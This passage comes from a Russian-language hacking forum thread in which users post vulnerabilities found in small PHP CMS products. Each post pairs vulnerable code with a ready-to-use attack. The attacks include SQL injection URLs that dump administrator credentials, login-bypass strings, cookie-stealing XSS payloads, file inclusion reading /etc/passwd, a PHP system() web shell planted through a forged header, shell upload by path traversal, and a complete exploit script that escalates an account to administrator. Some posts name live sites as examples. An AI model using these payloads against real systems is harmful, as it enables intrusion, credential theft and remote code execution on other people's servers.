    $gReadLevel$gWriteLevel;

        if (
    $folder_id >= 0)
        {
            
    $sql =  "select folder_lid, folder_id, folder_name, folder_label, folder_title, folder_desc, folder_keywords, 
                    folder_robots, folder_sidebar, folder_parent, folder_show, folder_active, folder_order,
                    read_level, write_level, upload_by, upload_on, update_on
                    from web_folder where folder_id=
    $folder_id and folder_lid=".$db->qstr(UserGetLID());

            
    $rs DbExecute($sql);
            if (
    $rs === falseDbFatalError("DBGetFolderData");
            if (!
    $rs->EOF)
            {...
    /_files/library/fun_dbutils.php
    PHP:
    ...function DbFatalError($section$msg='')
    {
        global 
    $db;

        if (!empty(
    $msg))
            
    $msg .= '. ';

        
    $msg .= $db->ErrorMsg();

        
    DbLogWrite($section'.MSG:'$msg);
        
    SystemFatalError($section$msg);
    }...
    /_files/library/cls_dbase.php
    PHP:
    ...
    function 
    ErrorMsg()
        {
            return 
    'DBError('.@mysql_errno().'): '.@mysql_error();
        }...
    /_files/library/fun_systems.php
    PHP:
    ...function SystemFatalError($section$msg)
    {
        
    SetDynamicContent();

        
    $out =  '<html><head><title>Fatal System Error</title>';
        
    $out .= '</head><body>';
        
    $out .= '<hr noshade size=2>';
        
    $out .= 'Fatal System Error On <b>'.$section.':</b><br> '.$msg;
        
    $out .= '<hr noshade size=2>';
        
    $out .= 'Sorry for this unconvenience. Please report to the webmaster of this homepage.';
        
    $out .= '</body></html>';

        echo 
    $out;

        die();
    }...
    Result:
    http://chakra/phpmod/news.php?op=detail&id=1&cat=3[SQL]
    http://chakra/phpmod/news.php?op=detail&id=1&cat=3+and+%281,2%29=%28select+*+from%28select+name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29--

    XSS
    /phpmod/search.php
    PHP:
    ...
    $q RequestGetValue('q''');
    $p RequestGetValue('p'1);


    $title "<h1>"._HPAGE_SEARCH_TITLE."</h1>\n";
    $content "<p>".sprintf(_HPAGE_SEARCH_MESSAGE$q)."</p>\n";...
    Result:
    http://chakra/phpmod/search.php?q=[XSS]
    http://chakra/phpmod/search.php?q=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E

    SQL inj
    /phpmod/link.php
    $op приним. (ряд. пользователь)
    PHP:
    ...case 'show':
        
    LinkInitVars();
        
    LinkFormShow('add'false);
        break;...
    Функция RequestGetValue описана выше!
    PHP:
    function LinkInitVars()
    {
        global 
    $gWebPage;
        global 
    $gPageId;
        global 
    $gFolder$gFolderId;
        

        
    $gWebPage['from']         = '';
        
    $gWebPage['fld_id']       = 0;
        
    $gWebPage['fld_url']      = '';
        
    $gWebPage['fld_title']    = '';
        
    $gWebPage['fld_desc']     = '';
        
    $gWebPage['fld_note']     = '';

        
    $gPageId RequestGetValue('id'0);
    }
    PHP:
    ...function LinkFormShow($op$dbinit$errmsg='')
    {
        global 
    $gFolder$gFolderId;
        global 
    $gRequestPath$gCurrentUrlPath$gRequestFile;
        global 
    $gWebPage;
        global 
    $gHomePageHeader$gHomePageFooter;
        global 
    $gBaseLocalPath;
        global 
    $gHomePageUrl$gPageNavigation;

        
    $from RequestGetValue('from');
        if (!empty(
    $from))
        {
            
    $gCurrentPageNavigation '';
            
    $gPageNavigation = array();
            
    $gPageNavigation[] = array($gHomePageUrl.$gBaseUrlPath."/index.html"_NAV_FRONTPAGE);
            
    $gPageNavigation[] = array($gHomePageUrl."/phpmod/cpanel.php"_NAV_CONTROL_PANEL);
            
    $gPageNavigation[] = array($gHomePageUrl."/phpmod/todo.php"_NAV_TODO_LIST);
            
    $gPageNavigation[] = array($gHomePageUrl."/phpmod/todo.php?op=link"_NAV_TODO_LINK);

            
    $gWebPage['from']   = $from;
        }
        else
        {
            
    DBGetFolderData($gFolderId);

            
    $gRequestPath FindPathFromFolderId($gFolderId);
            
    $gCurrentUrlPath $gBaseUrlPath.$gRequestPath;
            
    $gRequestFile 'index.html';

            
    $gWebPage['from']   = '';
        }
    ...
    Принтабельное поле, где именно код впадло искать ! :)
    Result:
    http://chakra/phpmod/link.php?op=show&cat=4[SQL]
    http://chakra/phpmod/link.php?op=show&cat=4+and+0+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,database%28%29,user%28%29,version%28%29%29,10,11,12,13,14,15,16,17,18--+
     
    #332 Strilo4ka, 25 Mar 2010
    Last edited: 26 Mar 2010
    3 people like this.
  13. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Продукт Micro CMS 3.5
    скачать
    SQL inj
    /microcms-admin-login.php
    PHP:
    ...if ($i == 0) {
                
    $sql '
                    SELECT *
                    FROM microcms_administrators
                    WHERE administrators_username = "' 
    $_POST['administrators_username'] . '" and
                        administrators_pass = PASSWORD("' 
    $_POST['administrators_pass'] . '")';
                
    $user_result mysql_query($sql);...
    Класика жанра!
    POST запрос:
    action - "microcms-admin-login.php"
    текстовое поле - "administrators_username",
    поле для ввода пасса - "administrators_pass",
    скрытое [ name="action" type="hidden" value="admin_login" ]

    Result:
    поле administrators_username = admin
    поле administrators_pass = 123") or 1=1 Или в первое поле - странная ошибка!
    Мы внутри! ;-)

    SQL inj
    /micro_cms_files/cms/revert-content.php - 3 поле принтаб
    PHP:
    ...if ($_GET['type'] == 'newer') {
            
    $result mysql_query('
                SELECT *
                FROM microcms_content_blurb_history
                WHERE content_blurbs_variable = "' 
    $_GET['id'] . '" and
                    content_blurb_history_version_num = "' 
    $_GET['version'] . '"
                ORDER BY content_blurb_history_version_num ASC
                LIMIT 1'
    );
        } elseif (
    $_GET['type'] == 'older') {...
    Result:
    http://microcms/micro_cms_files/cms/revert-content.php?id=test_content[SQL]&type=newest

    ы_ы, нашы админы!
    HTML:
    http://microcms/micro_cms_files/cms/revert-content.php?id=test_content%22+union+select+1,2,group_concat(concat_ws(0x3a,administrators_username,administrators_pass)%20separator%200x40),4,5+from+microcms_administrators--+&type=newest
    Забыл :
    условия - mg=off

    Реальные примеры:
    admin" or "admin"="admin" /*
    пасс любой

    admin" or "admin"="admin" /*
    пасс любой
     
    #333 Strilo4ka, 26 Mar 2010
    Last edited: 26 Mar 2010
    6 people like this.
  14. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    644
    Reputations:
    208
    Product: ArtiPHP
    Version: 5.0.0 Neo
    Author: http://www.artiphp.com/

    Blind SQL-Injection.

    Need: mq=off.

    File: artpublic/utilisateurs/modif_inscription.php

    PHP:
    $prenom htmlspecialchars($prenom);
        
    $nom htmlspecialchars($nom);
        
    $login htmlspecialchars($login);
        
    $login2 htmlspecialchars($_POST['login2']);
        
    $site htmlspecialchars($site);
        
    $url htmlspecialchars($url);
        
    $ville htmlspecialchars($ville);
        
    $metier htmlspecialchars($metier);
        
    $pass htmlspecialchars($pass);
        
    $pass2 htmlspecialchars($pass2);
    ....
    if (
    $pass && $pass2) {
            
    // ***** MODIF jimro ***** Ajout $passMD5 et modif requкte - 28/10/2005
            
    $passMD5 md5($pass);
            
    $requete "UPDATE " ARTI_PREFIX_TB "utilisateurs SET prenomUtilisateur='$prenom', nomUtilisateur='$nom', passUtilisateur=password('$pass'), passUtilisateurMD5='$passMD5', loginUtilisateur='$login2', siteUtilisateur='$site', urlUtilisateur='$url', villeUtilisateur='$ville', metierUtilisateur='$metier' WHERE id_utilisateur='$SESSION_ID'";
    ...
    Target:
    Expl0it:
    PHP:
    <?php

    /**
     * @author m0hze
     * @copyright 2010
     * @{http://forum.antichat.net}
     * @ Yeeeees, baby!
     */
    $host 'target.com'// URl target host example.com, don't use / (slash))!
    $path '/'// Path to target folder
    $login 'YouLogin'// Enter you login
    $password 'Password?'// Enter you password
    $newpass 'NewPassword :)'// This is you new password, for you account
    $groupid 1// You new GROUPID, 1 = administrator.
    function auth($login$password// Function auth on site, and get cookie

    {
        global 
    $host$path$authscript;
        
    $newpath $path 'artpublic/includes/verif_user.php';
        
    $data 'login=' $login '&pass=' $password;
        
    $fp fsockopen($host80);
        
    fputs($fp"POST $newpath HTTP/1.1\r\n");
        
    fputs($fp"Host: $host\r\n");
        
    fputs($fp"Content-type: application/x-www-form-urlencoded\r\n");
        
    fputs($fp"Content-length: " strlen($data) . "\r\n");
        
    fputs($fp"Connection: close\r\n\r\n");
        
    fputs($fp$data);
        while (!
    feof($fp)) {
            
    $result .= fgets($fp128);
        }
        if (
    stripos($result"index.php")) {
            
    preg_match('#Set-Cookie:(.*);#iU'$result$match);
            
    //list($name,$value) = explode('=',$match[1]);
            
    echo ("Authorisation: COMPLETE!...");
            return (
    trim($match[1]) . ';');
        } else {
            die(
    "Authorisation: FAILED!");
        }
    }
    function 
    exploit($cookie// Function exploit, change you group, password.

    {
        global 
    $host$path$authscript$newpass$groupid$login;
        
    $newpath $path 'artpublic/utilisateurs/modif_inscription.php';
        
    $data "prenom=HelloByExploit&nom=HelloByExploit&login2=$login',id_ugroup='".$groupid."',passUtilisateur=PASSWORD('" .
            
    $newpass "'),passUtilisateurMD5='" md5($newpass) .
            
    "'+where+loginUtilisateur='" $login "'+--+&login=$login&pass=1234&pass2=1234";
        
    $fp fsockopen($host80);
        
    fputs($fp"POST $newpath HTTP/1.1\r\n");
        
    fputs($fp"Host: $host\r\n");
        
    fputs($fp"Referer: $referer\r\n");
        
    fputs($fp"Cookie: $cookie\r\n");
        
    fputs($fp"Content-type: application/x-www-form-urlencoded\r\n");
        
    fputs($fp"Content-length: " strlen($data) . "\r\n");
        
    fputs($fp"Connection: close\r\n\r\n");
        
    fputs($fp$data);

        echo 
    '<br>Login: ' $login;
        echo 
    '<br>Password: ' $newpass;
    }
    exploit(auth($login$password));

    ?>
     
  15. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Siman!

    Продукт SiMan CMS 1.5

    скачать тут

    SQL inj
    index.php
    PHP:
    ...
    $_getvars=$_GET;
    $_postvars=$_POST;
    $_cookievars=$_COOKIE;
    $_servervars=$_SERVER;
    $_uplfilevars=$_FILES;
    ...
    PHP:
    ...$module=$_getvars["m"];
            
    $mode=$_getvars["d"];

            
    $special['sql']['count']=0;

            if (
    count($_getvars)==0)
                
    $special['is_index_page']=1;

            if (empty(
    $module) || strpos($module':') || strpos($module'.') || strpos($module'/') || strpos($module'\\'))...
    PHP:
    ...if ($module<>'404') include('modules/'.$module.'.php');...
    /modules/account.php
    PHP:
    ...$modules[$modules_index]["module"]='account';
            
    $modules[$modules_index]["title"]=$lang["register"];
            
    $login=$_postvars["p_login"];
            
    $password=$_postvars["p_password"];
            
    $password2=$_postvars["p_password2"];...
    PHP:
    ...sql="SELECT * FROM ".$tableusersprefix."users WHERE login = '$login'";
                
    $result=database_db_query($nameDB$sql$lnkDB);
                
    $u=0;
                while (
    $row=database_fetch_object($result))
                    {
                        if (
    strcmp($row->login$login)==0)
                            {
                                
    $u=1;
                            }
                    }
                if (
    $u!=1)
                    {
                        include(
    'ext/register.php');
                    }
                if (
    $u==1)...
    Условие:
    mg=off

    durability and result:
    action="index.php?m=account&d=login" , метод post
    поле login_d [SQL]
    поле passwd_d
    Тулим:
    login_d = admin' or 1=1/*
    разные вариации /*, -- # ... , просто есть beta версия CMS :)
    Мы внутри!

    Реальный пример:
    http://my-tut.org.ua/index.php?m=account&d=login
    login_d admin' or 1=1 --
    passwd_d безразницы!
     
    #335 Strilo4ka, 26 Mar 2010
    Last edited: 26 Mar 2010
    1 person likes this.
  16. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    644
    Reputations:
    208
    Product: JaF CMS
    Version: 4.0
    Author: http://jaf-cms.sourceforge.net/

    Remote File Inclusion

    Need: register_globals = on;

    File: /module/forum/main.php

    PHP:
    if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;}
    if(!isset(
    $csv_include))require($website.$main_dir."inc/csvfile.php");
    if(!isset(
    $fd))require($website.$main_dir."inc/functions.php");
    ...
    Target: http://targethost.com/module/forum/main.php?category=1&id=1&website=http://google.com%00

    and:

    File: /module/forum/forum.php

    PHP:
    if(!isset($csv_include))require($website.$main_dir."inc/csvfile.php");
    if(!isset(
    $fd))require($website.$main_dir."inc/functions.php"); ?>
    ....

    If, allow_url_include = off, use this:

    Code Exec

    File: online.php

    PHP:
    if(getenv("HTTP_CLIENT_IP")) {
        
        
    $ip getenv("HTTP_CLIENT_IP");
    } elseif(
    getenv("HTTP_X_FORWARDED_FOR")) {
        echo 
    'f';
        
    $ip getenv("HTTP_X_FORWARDED_FOR");
    } else {
        
    $ip getenv("REMOTE_ADDR");
    }
    ...
    $user_write fopen("$log_file""w");
        
    fputs($user_write $to_write );
        
    fclose($user_write );

    First step, enter you browser this url:

    http://targethost.com/online.php, and send this headers:

    Code:
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru,en-us;q=0.7,en;q=0.3
    Accept-Encoding: gzip,deflate
    [B]X-Forwarded-For: [COLOR=Red]<?php system($_GET[sec]); ?>[/COLOR][/B]
    
    Ok, next step - include log-file.

    Target: http://targethost.com/module/forum/main.php?category=1&id=1&website=../files/visitors%00&sec=dir
     
    #336 m0Hze, 27 Mar 2010
    Last edited: 27 Mar 2010
  17. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Чесно скажу >стыдно постить< - каменный век, но все же:
    Продукт netious-cms-serv-0.4
    Сайт : http://www.netious.com/

    SQL inj
    /[путь админки указ. при установке далее -1-]/index.php
    PHP:
    ...$result=mysql_query("SELECT AdminId FROM mycmsadmin WHERE username='$username' and password='".sha1($password)."'");
    $row=mysql_fetch_row($result);
    $num_rows mysql_num_rows($result);...
    Result:
    username admin' or 1=1--
    пасс любой!
    Внутри :)

    SQL inj
    /index.php
    PHP:
    ...$saction="deny";
    if (
    $sresult=mysql_query("SELECT Secured FROM pages WHERE PageId='$pageid'")) 
    {
    $srow=mysql_fetch_row($sresult);...
    Result:
    Code:
    http://netious/index.php?pageid=1[COLOR=Red][SQL][/COLOR]
    Code:
    http://netious/index.php?pageid=1'+and+0+union+select+1,version(),3--+
    Условия:
    register_globals=on
    magic_quotes=off

    XSS + SQL inj
    [-1-]/addtomenuResponse.php
    PHP:
    ...mysql_query("INSERT into pages VALUES ('','$refid','$name','$thisdescription','$thiskeywords','$alias','0','$pagetype','','$pagesecured')")
    or die(
    "Something went wrong: <br />".mysql_error());...
    include.php
    PHP:
    ...function commonheader($pageid,$title,$keywords,$description,$forcedid)
    {
    if (
    $pageid!="-1" && $pageid!="contact")
    {
    $result=mysql_query("SELECT Name, Keywords, Description FROM pages WHERE PageId='$pageid'");
        
    $row=mysql_fetch_row($result);
        
    $name=$row[0];
        
    $thiskeywords=$row[1];
        
    $thisdescription=$row[2];
    if (
    $forcedid=="no") {$title="$name :: $title";}...
    echo 
    "
    <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"
    \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
    <html xmlns=\"http://www.w3.org/1999/xhtml\">
    <head>
    <title>
    $title</title>...
    Дырявый как # :)
     
    #337 Strilo4ka, 27 Mar 2010
    Last edited: 27 Mar 2010
    2 people like this.
  18. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    644
    Reputations:
    208
    Product: VarioCMS
    Version: 0.5.6
    Author:: http://sourceforge.net/projects/variocms/

    SQL-Inj

    Need: mq=off;

    File: /plugins/system/slideshow/upload.php

    PHP:
    if (isset($_GET['album_id'])) {
        
    $album_id $_GET['album_id'];
      }
    ....
    $sql_insert "INSERT INTO " $db_plugin_prefix "slideshow (album, albumid, image, thumbnail, position) VALUES ('$album', '$album_id', '$image', '0', '$position')";
          
    fputs($logfile"$sql_insert\n");
    Target: http://localhost/bugs/VarioCMS/plugins/system/slideshow/upload.php?album=1&album_id=1'{SQL}.
    Columns: 7

    Upload Shell

    Need: none.

    File: /plugins/system/slideshow/upload.php

    PHP:
    if (isset($_GET['album_id'])) {
        
    $album_id $_GET['album_id'];
      }
    ..
    foreach (
    $_FILES as $file => $fileArray) {
        echo(
    "File key: $file\n");
        foreach (
    $fileArray as $item=>$val) {

        }

    //Let's manipulate the received file: in this demo, we just want to remove it!
        
    $new_dir $slideshow_path $album_id;
        if (
    file_exists($new_dir) == false) {
          
    mkdir ($new_dir);
          
    mkdir ($new_dir "/fullsize");
          
    mkdir ($new_dir "/slideshow");
          
    mkdir ($new_dir "/thumbnails");
        }

        
    $upload_dir $slideshow_path $album_id "/";
        
    $position 65000;
        if (
    move_uploaded_file($fileArray['tmp_name'], $upload_dir uml2nouml($fileArray['name']))) {
    Target:
    Expl0it ^_^:
    Code:
    <form  enctype="multipart/form-data" action="http://targethost.com/plugins/system/slideshow/upload.php?album=1" method="get" >
    <input type="file" name="Filedata" /><input type="submit" />
    <input type="text" name="album_id" value="[COLOR=Red][B]../../[/B][/COLOR]"/>
    </form>
    
    album_id = folder to upload shell.
     
  19. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    644
    Reputations:
    208
    Product: PithCMS
    Version: 0.9.5
    Author: http://sourceforge.net/projects/pithcms/

    Local File Inclusion



    File: newsreader.php

    Need: rg=on;

    PHP:
    include ("admin/lang/$lang");
    include (
    "_read_config.inc.php");
    include_once (
    "inc/cleaner.inc.php");
    Target: http://targethost.com/newsreader.php?lang=../../../../../../etc/passwd

    File: admin/blog.php

    Need:logged on target site!

    PHP:
     session_start();
            if (!isset(
    $_SESSION['user'])) {
                    echo 
    "<h2>ACCESS DENIED AND LOGGED</h2>";
                    exit;
            }
    ...
    (isset($_POST['filename'])) {
                    
    //include ("$rootdir/articles/".$_POST['filename']); 
                    
    include ("../news/".$_POST['filename']); 
                }else{
    ...
    Target: {POST} http://targethost.com/admin/blog.php?filename=../../../../../../../../../etc/passwd

    Remove arbitrary file

    File: admin/download_remove.php

    Need: logged on target site!

    PHP:
    if (isset($_POST['file']) && ($_POST['file'] != "lista.php") && ($_POST['file'] != "index.php") && ($_POST['file'] != "")) { 
            
    $file trim($_POST['file']);
            
    $object = ("../downloads/$file");
    Target: {POST} http://targethost.com/admin/download_remove.php?file=../indeX.php
     
  20. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    MusicBox v3.3

    SQL Injection:

    /blogs.php?action=edit&newsid=-1+union+select+concat_ws(0x3a,user(),database(),version())+--+
    /genre_artists.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7+--+

    Пассивная XSS:

    /index.php?in=artist&term=%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3EE&action=search&start=0&x=0&y=0
    /index.php?action=top&show=5&type=Artists+order+by+1+--+%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3E

    Активная XSS:

    /member.php?uname=кому будем посылать XSS, в комменты <sсriрt>alert(document.cookie);</sсriрt>


    По идеи почти каждый параметр уязвим.

    /phpinfo.php ;)
     
    3 people like this.
Loading...